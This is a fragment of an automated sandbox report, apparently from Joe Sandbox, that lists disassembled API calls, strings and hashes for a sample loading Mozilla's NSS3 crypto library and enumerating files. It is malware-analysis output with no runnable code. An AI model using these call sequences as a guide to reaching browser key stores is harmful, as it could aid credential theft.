                                                                                                                                                                                                              • PR_CallOnce.NSS3(6CC224C0,6CB17590), ref: 6CAD7104
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAD7117
                                                                                                                                                                                                              • SECOID_Init.NSS3 ref: 6CAD7128
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(00000057), ref: 6CAD714E
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAD717F
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAD71A9
                                                                                                                                                                                                              • PR_NotifyAllCondVar.NSS3 ref: 6CAD71CF
                                                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CAD71DD
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CAD71EE
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAD7208
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAD7221
                                                                                                                                                                                                              • free.MOZGLUE(00000001), ref: 6CAD7235
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CAD724A
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CAD725E
                                                                                                                                                                                                              • PR_NotifyCondVar.NSS3 ref: 6CAD7273
                                                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CAD7281
                                                                                                                                                                                                              • SECMOD_DestroyModule.NSS3(00000000), ref: 6CAD7291
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAD72B1
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAD72D4
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAD72E3
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAD7301
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAD7310
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAD7335
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAD7344
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAD7363
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAD7372
                                                                                                                                                                                                              • PR_smprintf.NSS3(name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s",NSS Internal Module,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,6CC10148,,defaultModDB,internalKeySlot), ref: 6CAD74CC
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAD7513
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAD751B
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAD7528
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAD753C
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAD7550
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAD7561
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAD7572
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAD7583
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAD7594
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAD75A2
                                                                                                                                                                                                              • SECMOD_LoadModule.NSS3(00000000,00000000,00000001), ref: 6CAD75BD
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAD75C8
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAD75F1
                                                                                                                                                                                                              • PR_NewLock.NSS3 ref: 6CAD7636
                                                                                                                                                                                                              • SECMOD_DestroyModule.NSS3(00000000), ref: 6CAD7686
                                                                                                                                                                                                              • PR_NewLock.NSS3 ref: 6CAD76A2
                                                                                                                                                                                                                • Part of subcall function 6CB898D0: calloc.MOZGLUE(00000001,00000084,6CAB0936,00000001,?,6CAB102C), ref: 6CB898E5
                                                                                                                                                                                                              • PORT_ZAlloc_Util.NSS3(00000050), ref: 6CAD76B6
                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004), ref: 6CAD7707
                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6CAD771C
                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6CAD7731
                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,rdb:,00000004), ref: 6CAD774A
                                                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(?), ref: 6CAD7770
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CAD7779
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAD779A
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAD77AC
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(-0000000D), ref: 6CAD77C4
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CAD77DB
                                                                                                                                                                                                              • strrchr.VCRUNTIME140(?,0000002F), ref: 6CAD7821
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(?), ref: 6CAD7837
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6CAD785B
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CAD786F
                                                                                                                                                                                                              • SECMOD_AddNewModuleEx.NSS3 ref: 6CAD78AC
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAD78BE
                                                                                                                                                                                                              • SECMOD_AddNewModuleEx.NSS3 ref: 6CAD78F3
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAD78FC
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAD791C
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA4204A), ref: 6CAB07AD
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA4204A), ref: 6CAB07CD
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA4204A), ref: 6CAB07D6
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA4204A), ref: 6CAB07E4
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,6CA4204A), ref: 6CAB0864
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CAB0880
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,?,6CA4204A), ref: 6CAB08CB
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsGetValue.KERNEL32(?,?,6CA4204A), ref: 6CAB08D7
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsGetValue.KERNEL32(?,?,6CA4204A), ref: 6CAB08FB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • kbi., xrefs: 6CAD7886
                                                                                                                                                                                                              • sql:, xrefs: 6CAD76FE
                                                                                                                                                                                                              • dll, xrefs: 6CAD788E
                                                                                                                                                                                                              • Spac, xrefs: 6CAD7389
                                                                                                                                                                                                              • extern:, xrefs: 6CAD772B
                                                                                                                                                                                                              • NSS Internal Module, xrefs: 6CAD74A2, 6CAD74C6
                                                                                                                                                                                                              • name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s", xrefs: 6CAD74C7
                                                                                                                                                                                                              • dbm:, xrefs: 6CAD7716
                                                                                                                                                                                                              • ,defaultModDB,internalKeySlot, xrefs: 6CAD748D, 6CAD74AA
                                                                                                                                                                                                              • rdb:, xrefs: 6CAD7744
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$strlen$Value$Alloc_ModuleUtil$CriticalSectionstrncmp$CondEnterUnlockcallocmemcpy$CallDestroyErrorLockNotifyOnce$DeleteInitLoadR_smprintfWaitstrrchr
                                                                                                                                                                                                              • String ID: ,defaultModDB,internalKeySlot$NSS Internal Module$Spac$dbm:$dll$extern:$kbi.$name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s"$rdb:$sql:
                                                                                                                                                                                                              • API String ID: 3465160547-3797173233
                                                                                                                                                                                                              • Opcode ID: 0033a0a4518ac31c2ea5f9f2b850afdf1191d5e16e9db643e2800217092f2e3b
                                                                                                                                                                                                              • Instruction ID: 07bb3b998f611ebd143df005a1e60a5d276324f1b5cebdcfdd50e0c0bf897e11
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0033a0a4518ac31c2ea5f9f2b850afdf1191d5e16e9db643e2800217092f2e3b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1752F2B1E112419BEF158F64CC05BAE7BB4BF05308F1A4128ED09E7B45E771E998CB92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,6CBEA8EC,0000006C), ref: 6CAE6DC6
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,6CBEA958,0000006C), ref: 6CAE6DDB
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,6CBEA9C4,00000078), ref: 6CAE6DF1
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,6CBEAA3C,0000006C), ref: 6CAE6E06
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,6CBEAAA8,00000060), ref: 6CAE6E1C
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAE6E38
                                                                                                                                                                                                                • Part of subcall function 6CB6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB6C2BF
                                                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,?), ref: 6CAE6E76
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CAE726F
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CAE7283
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
                                                                                                                                                                                                              • String ID: !
                                                                                                                                                                                                              • API String ID: 3333340300-2657877971
                                                                                                                                                                                                              • Opcode ID: e0aaa147e4306422cc6996dc2307ae66f3be64c4bc236be55d10a052fe8c8dc4
                                                                                                                                                                                                              • Instruction ID: 64e18083a89714533b4d5c2e5a09cdd55b22f0d4fb5d7ab3ff61a72ca8728e89
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e0aaa147e4306422cc6996dc2307ae66f3be64c4bc236be55d10a052fe8c8dc4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97729E75E052199FDF60DF28CC88B9ABBB5AF49304F1441A9D80DA7741EB31AAC4CF91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA53C66
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(000000FD,?), ref: 6CA53D04
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA53EAD
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA53ED7
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA53F74
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA54052
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA5406F
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001), ref: 6CA5410D
                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011A47,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA5449C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _byteswap_ulong$sqlite3_log
                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                              • API String ID: 2597148001-598938438
                                                                                                                                                                                                              • Opcode ID: 192f7919013a8e32a545e3d8a0a232b1bf8185599c161e31fa8902d8781ec2f0
                                                                                                                                                                                                              • Instruction ID: 7cf78680c309b1b67fba0292d6c1e807af3eac505ebe97b48af5683bd1259e51
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 192f7919013a8e32a545e3d8a0a232b1bf8185599c161e31fa8902d8781ec2f0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D82A075A01204DFCB04CF69C480B9EB7B2BF89318F698168D905ABB51D731ECA6CB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PORT_ArenaMark_Util.NSS3(?), ref: 6CB2ACC4
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6CB2ACD5
                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6CB2ACF3
                                                                                                                                                                                                              • SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6CB2AD3B
                                                                                                                                                                                                              • SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6CB2ADC8
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB2ADDF
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB2ADF0
                                                                                                                                                                                                                • Part of subcall function 6CB6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB6C2BF
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB2B06A
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB2B08C
                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CB2B1BA
                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CB2B27C
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00002010), ref: 6CB2B2CA
                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CB2B3C1
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB2B40C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1285963562-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • sqlite3_initialize.NSS3 ref: 6CAAED38
                                                                                                                                                                                                                • Part of subcall function 6CA44F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA44FC4
                                                                                                                                                                                                              • sqlite3_mprintf.NSS3(snippet), ref: 6CAAEF3C
                                                                                                                                                                                                              • sqlite3_mprintf.NSS3(offsets), ref: 6CAAEFE4
                                                                                                                                                                                                                • Part of subcall function 6CB6DFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6CA45001,?,00000003,00000000), ref: 6CB6DFD7
                                                                                                                                                                                                              • sqlite3_mprintf.NSS3(matchinfo), ref: 6CAAF087
                                                                                                                                                                                                              • sqlite3_mprintf.NSS3(matchinfo), ref: 6CAAF129
                                                                                                                                                                                                              • sqlite3_mprintf.NSS3(optimize), ref: 6CAAF1D1
                                                                                                                                                                                                              • sqlite3_free.NSS3(?), ref: 6CAAF368
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
                                                                                                                                                                                                              • String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
                                                                                                                                                                                                              • API String ID: 2518200370-449611708
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB27C33
                                                                                                                                                                                                              • NSS_OptionGet.NSS3(0000000C,00000000), ref: 6CB27C66
                                                                                                                                                                                                              • CERT_DestroyCertificate.NSS3(00000000), ref: 6CB27D1E
                                                                                                                                                                                                                • Part of subcall function 6CB27870: SECOID_FindOID_Util.NSS3(?,?,?,6CB291C5), ref: 6CB2788F
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB27D48
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE067,00000000), ref: 6CB27D71
                                                                                                                                                                                                              • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6CB27DD3
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CB27DE1
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB27DF8
                                                                                                                                                                                                              • SECKEY_DestroyPublicKey.NSS3(?), ref: 6CB27E1A
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE067,00000000), ref: 6CB27E58
                                                                                                                                                                                                                • Part of subcall function 6CB27870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CB291C5), ref: 6CB278BB
                                                                                                                                                                                                                • Part of subcall function 6CB27870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6CB291C5), ref: 6CB278FA
                                                                                                                                                                                                                • Part of subcall function 6CB27870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6CB291C5), ref: 6CB27930
                                                                                                                                                                                                                • Part of subcall function 6CB27870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CB291C5), ref: 6CB27951
                                                                                                                                                                                                                • Part of subcall function 6CB27870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6CB27964
                                                                                                                                                                                                                • Part of subcall function 6CB27870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CB2797A
                                                                                                                                                                                                                • Part of subcall function 6CB27870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6CB27988
                                                                                                                                                                                                                • Part of subcall function 6CB27870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6CB27998
                                                                                                                                                                                                                • Part of subcall function 6CB27870: free.MOZGLUE(00000000), ref: 6CB279A7
                                                                                                                                                                                                                • Part of subcall function 6CB27870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6CB291C5), ref: 6CB279BB
                                                                                                                                                                                                                • Part of subcall function 6CB27870: PR_GetCurrentThread.NSS3(?,?,?,?,6CB291C5), ref: 6CB279CA
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB27E49
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CB27F8C
                                                                                                                                                                                                              • SECKEY_DestroyPublicKey.NSS3(?), ref: 6CB27F98
                                                                                                                                                                                                              • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CB27FBF
                                                                                                                                                                                                              • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CB27FD9
                                                                                                                                                                                                              • PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6CB28038
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6CB28050
                                                                                                                                                                                                              • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6CB28093
                                                                                                                                                                                                              • SECOID_FindOID_Util.NSS3 ref: 6CB27F29
                                                                                                                                                                                                                • Part of subcall function 6CB207B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CAC8298,?,?,?,6CABFCE5,?), ref: 6CB207BF
                                                                                                                                                                                                                • Part of subcall function 6CB207B0: PL_HashTableLookup.NSS3(?,?), ref: 6CB207E6
                                                                                                                                                                                                                • Part of subcall function 6CB207B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CB2081B
                                                                                                                                                                                                                • Part of subcall function 6CB207B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CB20825
                                                                                                                                                                                                              • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6CB28072
                                                                                                                                                                                                              • SECOID_FindOID_Util.NSS3 ref: 6CB280F5
                                                                                                                                                                                                                • Part of subcall function 6CB2BC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6CB2800A,00000000,?,00000000,?), ref: 6CB2BC3F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2815116071-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00935B72
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00935B79
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00935B92
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00935BA9
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00956AA0), ref: 00935BCA
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00956AA4), ref: 00935BE4
